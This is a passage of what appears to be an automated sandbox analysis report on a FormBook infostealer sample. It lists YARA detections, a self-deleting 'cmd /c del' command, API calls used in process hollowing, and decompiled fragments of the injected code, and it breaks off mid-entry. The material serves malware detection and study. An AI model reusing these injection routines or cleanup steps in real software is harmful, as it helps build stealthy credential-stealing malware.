                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:17:24:55
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                                            Imagebase:0x4a120000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                              Executed Functions

                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045C9DF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045C9DF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C453
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C453
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C592
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C592
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0045C302
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0045C302
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0045C1D7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0045C1D7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0045C0B6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0045C0B6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413774877.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413774877.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413759807.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413759807.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LgsX$UUUU
                                                              • API String ID: 0-1207212886
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.415035923.0000000001092000.00000020.00020000.sdmp, Offset: 01090000, based on PE: true
                                                              • Associated: 00000003.00000002.415024400.0000000001090000.00000002.00020000.sdmp
                                                              • Associated: 00000003.00000002.415164595.0000000001146000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              C-Code - Quality: 37%
                                                              			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t20;
                                                              				void* _t29;
                                                              				intOrPtr* _t31;
                                                              				void* _t33;
                                                              
                                                              				_t15 = _a4;
                                                              				_t31 = _a4 + 0xc48;
                                                              				E0041AF60(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                                              				_t4 =  &_a40; // 0x414a31
                                                              				_t6 =  &_a32; // 0x414d72
                                                              				_t12 =  &_a8; // 0x414d72
                                                              				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, 0x55c68072, _t33); // executed
                                                              				return _t20;
                                                              			}








                                                              APIs
                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1JA$rMA$rMA
                                                              • API String ID: 2738559852-782607585
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t18;
                                                              				void* _t27;
                                                              				intOrPtr* _t28;
                                                              
                                                              				_t13 = _a4;
                                                              				_t28 = _a4 + 0xc48;
                                                              				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                              				_t4 =  &_a40; // 0x414a31
                                                              				_t6 =  &_a32; // 0x414d72
                                                              				_t12 =  &_a8; // 0x414d72
                                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                              				return _t18;
                                                              			}







                                                              APIs
                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1JA$rMA$rMA
                                                              • API String ID: 2738559852-782607585
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                              				char* _v8;
                                                              				struct _EXCEPTION_RECORD _v12;
                                                              				struct _OBJDIR_INFORMATION _v16;
                                                              				char _v536;
                                                              				void* _t15;
                                                              				struct _OBJDIR_INFORMATION _t17;
                                                              				struct _OBJDIR_INFORMATION _t18;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              
                                                              				_t24 = _a8;
                                                              				_v8 =  &_v536;
                                                              				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                                              				_t31 = _t30 + 0xc;
                                                              				if(_t15 != 0) {
                                                              					_t17 = E0041D070(_v8, _t24, __eflags, _v8);
                                                              					_t32 = _t31 + 4;
                                                              					__eflags = _t17;
                                                              					if(_t17 != 0) {
                                                              						E0041D2F0( &_v12, 0);
                                                              						_t32 = _t32 + 8;
                                                              					}
                                                              					_t18 = E0041B4A0(_v8);
                                                              					_v16 = _t18;
                                                              					__eflags = _t18;
                                                              					if(_t18 == 0) {
                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                              						return _v16;
                                                              					}
                                                              					return _t18;
                                                              				} else {
                                                              					return _t15;
                                                              				}
                                                              			}














                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				long _t21;
                                                              				void* _t31;
                                                              
                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                              				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              				return _t21;
                                                              			}






                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A53C(void* __ecx, signed int __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				long _t17;
                                                              
                                                              				 *(__ecx + 0x55) =  *(__ecx + 0x55) & __edi;
                                                              				_t13 = _a4;
                                                              				_t5 = _t13 + 0xc60; // 0xca0
                                                              				E0041AF60(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t17;
                                                              			}





                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				long _t14;
                                                              				void* _t21;
                                                              
                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                              				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t14;
                                                              			}






                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A490(intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_t3 = _t5 + 0xc50; // 0x40a943
                                                              				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}






                                                              APIs
                                                              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E00409AB0(intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				char _v24;
                                                              				char _v284;
                                                              				char _v804;
                                                              				char _v840;
                                                              				void* _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t39;
                                                              				void* _t50;
                                                              				intOrPtr* _t52;
                                                              				void* _t53;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              
                                                              				_t52 = _a4;
                                                              				_t39 = 0; // executed
                                                              				_t24 = E00407EA0(_t52,  &_v24); // executed
                                                              				_t54 = _t53 + 8;
                                                              				if(_t24 != 0) {
                                                              					E004080B0( &_v24,  &_v840);
                                                              					_t55 = _t54 + 8;
                                                              					do {
                                                              						E0041BE10( &_v284, 0x104);
                                                              						E0041C480( &_v284,  &_v804);
                                                              						_t56 = _t55 + 0x10;
                                                              						_t50 = 0x4f;
                                                              						while(1) {
                                                              							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                                              							_t56 = _t56 + 0x10;
                                                              							if(_t31 != 0) {
                                                              								break;
                                                              							}
                                                              							_t50 = _t50 + 1;
                                                              							if(_t50 <= 0x62) {
                                                              								continue;
                                                              							} else {
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						_t9 = _t52 + 0x14; // 0xffffe045
                                                              						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                              						_t39 = 1;
                                                              						L8:
                                                              						_t33 = E004080E0( &_v24,  &_v840);
                                                              						_t55 = _t56 + 8;
                                                              					} while (_t33 != 0 && _t39 == 0);
                                                              					_t34 = E00408160(_t52,  &_v24); // executed
                                                              					if(_t39 == 0) {
                                                              						asm("rdtsc");
                                                              						asm("rdtsc");
                                                              						_v8 = _t34 - 0 + _t34;
                                                              						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                              					}
                                                              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                              					_t20 = _t52 + 0x31; // 0x5608758b
                                                              					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                              					return 1;
                                                              				} else {
                                                              					return _t24;
                                                              				}
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6EA
                                                              • API String ID: 1279760036-1400015478
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID: .AP
                                                              • API String ID: 2186235152-3996626295
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                              				void* _t10;
                                                              				void* _t15;
                                                              
                                                              				_t7 = _a4;
                                                              				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
                                                              				_t6 =  &_a8; // 0x414536
                                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6EA
                                                              • API String ID: 1279760036-1400015478
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E00408308(void* __eflags, intOrPtr _a4, long _a8) {
                                                              				char _v67;
                                                              				char _v68;
                                                              				long __edi;
                                                              				signed int __esi;
                                                              				void* __ebp;
                                                              
                                                              				if(__eflags != 0) {
                                                              					asm("adc eax, 0x559909f8");
                                                              					_push(__ebp);
                                                              					__ebp = __esp;
                                                              					__esp = __esp - 0x40;
                                                              					_push(__esi);
                                                              					__eax =  &_v67;
                                                              					_v68 = 0;
                                                              					__eax = E0041BE60( &_v67, 0, 0x3f);
                                                              					__ecx =  &_v68;
                                                              					__eax = E0041CA00( &_v68, 3);
                                                              					_a4 = _a4 + 0x1c;
                                                              					__eax = E0040ACF0(__eflags, _a4 + 0x1c,  &_v68); // executed
                                                              					__eax = E00414E50(_a4 + 0x1c, __eax, 0, 0, 0xc4e7b6d6);
                                                              					__esi = __eax;
                                                              					__eflags = __esi;
                                                              					if(__esi != 0) {
                                                              						_push(__edi);
                                                              						__edi = _a8;
                                                              						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                                              						__eflags = __eax;
                                                              						if(__eflags == 0) {
                                                              							__eax = E0040A480(__ecx, __eflags, 1, 8);
                                                              							__eax = __al & 0x000000ff;
                                                              							__ecx = __ebp + __eax - 0x40;
                                                              							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
                                                              						}
                                                              						_pop(__edi);
                                                              					}
                                                              					_pop(__esi);
                                                              					__esp = __ebp;
                                                              					_pop(__ebp);
                                                              					return __eax;
                                                              				}
                                                              			}









                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                                              				char _v67;
                                                              				char _v68;
                                                              				void* _t12;
                                                              				intOrPtr* _t13;
                                                              				int _t14;
                                                              				long _t21;
                                                              				intOrPtr* _t25;
                                                              				void* _t26;
                                                              				void* _t30;
                                                              
                                                              				_t30 = __eflags;
                                                              				_v68 = 0;
                                                              				E0041BE60( &_v67, 0, 0x3f);
                                                              				E0041CA00( &_v68, 3);
                                                              				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                              				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                              				_t25 = _t13;
                                                              				if(_t25 != 0) {
                                                              					_t21 = _a8;
                                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                              					_t32 = _t14;
                                                              					if(_t14 == 0) {
                                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480( &_v68, _t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                              					}
                                                              					return _t14;
                                                              				}
                                                              				return _t13;
                                                              			}













                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
